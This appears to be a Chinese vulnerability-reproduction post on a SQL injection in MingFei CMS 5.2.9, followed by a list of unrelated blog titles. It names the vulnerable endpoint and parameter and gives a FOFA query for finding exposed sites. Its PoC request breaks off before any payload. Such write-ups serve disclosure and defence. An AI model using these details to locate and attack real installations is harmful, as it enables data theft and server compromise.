铭飞CMS SQL注入漏洞复现(CNVD-2024-06148)

0x01 产品简介

铭飞CMS是一款基于java开发的一套轻量级开源内容管理系统,铭飞CMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。

0x02 漏洞概述

由于铭飞CMS 文章列表接口content/list.do中的sqlWhere参数缺少对外部输入SQL语句的验证,未经身份验证的攻击者可利用该漏洞获取数据库敏感数据,进一步利用可获取服务器权限。

0x03 影响范围

铭飞CMS = 5.2.9

0x04 复现环境

FOFA:

body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"

0x05 漏洞复现 

PoC

POST /cms/content/list.do HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-

最近更新

  1. TCP协议是安全的吗?

    2024-04-30 22:48:01       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-30 22:48:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-04-30 22:48:01       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-04-30 22:48:01       20 阅读

热门阅读

  1. MySQL-角色管理

    2024-04-30 22:48:01       12 阅读
  2. 「Destiny」Solution

    2024-04-30 22:48:01       12 阅读
  3. Agent AI智能体的崛起和未来社会角色

    2024-04-30 22:48:01       10 阅读
  4. PCL 点云下采样VoxelGrid滤波器

    2024-04-30 22:48:01       13 阅读
  5. 程序员通过用户画像细化客户

    2024-04-30 22:48:01       11 阅读
  6. C#中正则表达式(Regular Expression)

    2024-04-30 22:48:01       15 阅读
  7. 电脑有用快捷键

    2024-04-30 22:48:01       11 阅读
  8. python实现Web开发的工具

    2024-04-30 22:48:01       11 阅读
  9. Python FastApi 解决跨域及OPTIONS预请求处理

    2024-04-30 22:48:01       14 阅读
  10. 汇编语言-DIV指令(除法指令)

    2024-04-30 22:48:01       11 阅读